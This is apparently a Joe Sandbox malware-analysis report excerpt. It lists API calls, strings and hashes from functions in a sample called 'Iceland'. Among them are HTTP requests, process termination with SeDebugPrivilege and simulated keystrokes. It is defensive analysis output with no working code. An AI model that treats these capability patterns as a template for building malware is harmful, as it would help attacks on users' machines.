                                                                                                                                                                                                                                                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00AB95C7
                                                                                                                                                                                                                                                                • ImageList_EndDrag.COMCTL32 ref: 00AB95CD
                                                                                                                                                                                                                                                                • ReleaseCapture.USER32 ref: 00AB95D3
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00AB966E
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00AB9681
                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00AB975B
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                                                • API String ID: 1924731296-2107944366
                                                                                                                                                                                                                                                                • Opcode ID: 6f525b1955cdb9f8daf461ac693885582dedc3cef384078b3e986f7dbaffddf0
                                                                                                                                                                                                                                                                • Instruction ID: f47440eb4e21e8dd880dd35b63c032be2a08d4cd8ac0bb7458653df2aabde4ef
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f525b1955cdb9f8daf461ac693885582dedc3cef384078b3e986f7dbaffddf0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A151BE71104314AFD704EF64DD96FAA77E8FB88714F000A2CFA96972E2DB709945CB52
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A9CCB7
                                                                                                                                                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A9CCDF
                                                                                                                                                                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A9CD0F
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A9CD67
                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 00A9CD7B
                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00A9CD86
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                • Opcode ID: b4b5c042b257bf7475fa7bb81b3702c311667467dd4109d4503c8dfd7356586d
                                                                                                                                                                                                                                                                • Instruction ID: bc90247c01087cae89dcd4f384defe74e91b4b984c1c42f4656e4c911c828c37
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4b5c042b257bf7475fa7bb81b3702c311667467dd4109d4503c8dfd7356586d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85319F75600A04AFDB21EFA48D88AAB7FFCEB45750B10452AF44696211EB34DD459B60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00A655AE,?,?,Bad directive syntax error,00ABDCD0,00000000,00000010,?,?), ref: 00A8A236
                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000000,?,00A655AE,?), ref: 00A8A23D
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00A8A301
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                • Opcode ID: 2010e9fdd98d05d4f4b5cc35e3f6d52fd2dd6e0b7a3c294b393d94354bf4b4a5
                                                                                                                                                                                                                                                                • Instruction ID: ab73aa65961f49b9811492af4d178213975a9f344477f9233f80793cd185667b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2010e9fdd98d05d4f4b5cc35e3f6d52fd2dd6e0b7a3c294b393d94354bf4b4a5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8215E3285025EEFDF12FBA4DD06EEE7B39BF18700F044866F515650A2EB72A618DB11
APIs
• GetParent.USER32 ref: 00A829F8
• GetClassNameW.USER32(00000000,?,00000100), ref: 00A82A0D
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00A82A9A
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
Similarity
• API ID: ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1290815626-3381328864
APIs
• GetClientRect.USER32(?,?), ref: 00A2758D
• GetWindowRect.USER32(?,?), ref: 00A275CE
• ScreenToClient.USER32(?,?), ref: 00A275F6
• GetClientRect.USER32(?,?), ref: 00A2773A
• GetWindowRect.USER32(?,?), ref: 00A2775B
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
Similarity
• API ID: Rect$Client$Window$Screen
• String ID:
• API String ID: 1296646539-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
Similarity
• API ID: _free$EnvironmentVariable___from_strstr_to_strchr
• String ID:
• API String ID: 1282221369-0
APIs
• SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00AB5C24
• ShowWindow.USER32(?,00000000), ref: 00AB5C65
• ShowWindow.USER32(?,00000005,?,00000000), ref: 00AB5C6B
• SetFocus.USER32(?,?,00000005,?,00000000), ref: 00AB5C6F
  • Part of subcall function 00AB79F2: DeleteObject.GDI32(00000000), ref: 00AB7A1E
• GetWindowLongW.USER32(?,000000F0), ref: 00AB5CAB
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AB5CB8
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00AB5CEB
• SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00AB5D25
• SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00AB5D34
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
Similarity
• API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
• String ID:
• API String ID: 3210457359-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00A628D1
                                                                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00A628EA
                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00A628FA
                                                                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00A62912
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00A62933
                                                                                                                                                                                                                                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00A211F5,00000000,00000000,00000000,000000FF,00000000), ref: 00A62942
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00A6295F
                                                                                                                                                                                                                                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00A211F5,00000000,00000000,00000000,000000FF,00000000), ref: 00A6296E
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1268354404-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A9CBC7
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A9CBDA
                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 00A9CBEE
                                                                                                                                                                                                                                                                  • Part of subcall function 00A9CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A9CCB7
                                                                                                                                                                                                                                                                  • Part of subcall function 00A9CC98: GetLastError.KERNEL32 ref: 00A9CD67
                                                                                                                                                                                                                                                                  • Part of subcall function 00A9CC98: SetEvent.KERNEL32(?), ref: 00A9CD7B
                                                                                                                                                                                                                                                                  • Part of subcall function 00A9CC98: InternetCloseHandle.WININET(00000000), ref: 00A9CD86
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 337547030-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A84393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A843AD
                                                                                                                                                                                                                                                                  • Part of subcall function 00A84393: GetCurrentThreadId.KERNEL32 ref: 00A843B4
                                                                                                                                                                                                                                                                  • Part of subcall function 00A84393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A82F00), ref: 00A843BB
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A82F0A
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00A82F28
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00A82F2C
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A82F36
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00A82F4E
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00A82F52
                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A82F5C
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00A82F70
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00A82F74
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00A81D95,?,?,00000000), ref: 00A82159
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00A81D95,?,?,00000000), ref: 00A82160
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A81D95,?,?,00000000), ref: 00A82175
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00A81D95,?,?,00000000), ref: 00A8217D
                                                                                                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00A81D95,?,?,00000000), ref: 00A82180
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A81D95,?,?,00000000), ref: 00A82190
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00A81D95,00000000,?,00A81D95,?,?,00000000), ref: 00A82198
                                                                                                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00A81D95,?,?,00000000), ref: 00A8219B
                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00A821C1,00000000,00000000,00000000), ref: 00A821B5
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00A8DDAC
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00A8DDBA
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8DD87: CloseHandle.KERNEL32(00000000), ref: 00A8DE87
                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AAABCA
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00AAABDD
                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AAAC10
                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00AAACC5
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00AAACD0
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AAAD21
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                • Opcode ID: 6e5e95e318498c16ebf9b5c21b7eb19fd2640fffa0ce1ddbcd91936c73c85c5e
                                                                                                                                                                                                                                                                • Instruction ID: 08e40e0ad2b1d3d63f05cbaac4a3fb04c19c371cb53f77b163bee36f5a068243
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e5e95e318498c16ebf9b5c21b7eb19fd2640fffa0ce1ddbcd91936c73c85c5e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6261AD71204242AFE314DF58C584F29BBE1AF55318F18849CE4A64BBE3D771EC85CB92
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00AB43C1
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00AB43D6
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00AB43F0
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB4435
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00AB4462
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00AB4490
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                • String ID: SysListView32
                                                                                                                                                                                                                                                                • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                • Opcode ID: 0eee2195531c8d18744ce2bf61f722fdab0e24512580a8ab8cfacd8229500c2a
                                                                                                                                                                                                                                                                • Instruction ID: a3229bd3b39ad88b0fbb0c165c82b671ed78b986604552355e49db017c4b0025
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0eee2195531c8d18744ce2bf61f722fdab0e24512580a8ab8cfacd8229500c2a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D841AC71A00319ABDF21DFA4CC49BEA7BA9FB4C350F140526F948EB293D7759990CB90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A8C6C4
                                                                                                                                                                                                                                                                • IsMenu.USER32(00000000), ref: 00A8C6E4
                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00A8C71A
                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(00B85ED0), ref: 00A8C76B
                                                                                                                                                                                                                                                                • InsertMenuItemW.USER32(00B85ED0,?,00000001,00000030), ref: 00A8C793
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                • String ID: 0$2
                                                                                                                                                                                                                                                                • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                • Opcode ID: 247885782cdb8816fa1661bf032be7de7bb07df79b98c5fb22c03adb1fd5229d
                                                                                                                                                                                                                                                                • Instruction ID: f09ecb7abf12cfc133620dc0398153be311fe326b8730328dceab43a9c58b0af
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 247885782cdb8816fa1661bf032be7de7bb07df79b98c5fb22c03adb1fd5229d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7251A2706002059FDF20EFB8D984BAEBBF5EF58324F24426AE91197292E7709945CF71
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 00A8D1BE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: IconLoad
                                                                                                                                                                                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                                • Opcode ID: 1e8bfc526278783fbb77450c22ab645e692369ea4404ff9c3a789655b2a601b8
                                                                                                                                                                                                                                                                • Instruction ID: e4d50790234baefac7e0b59129de072c6b7e6eb09145d8ccce780e238e975f75
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e8bfc526278783fbb77450c22ab645e692369ea4404ff9c3a789655b2a601b8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF11E93564C746BEE7057B55DC86EAE77AC9F09760B20022AF904A61C1E7B4AA414760
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                • String ID: 0.0.0.0
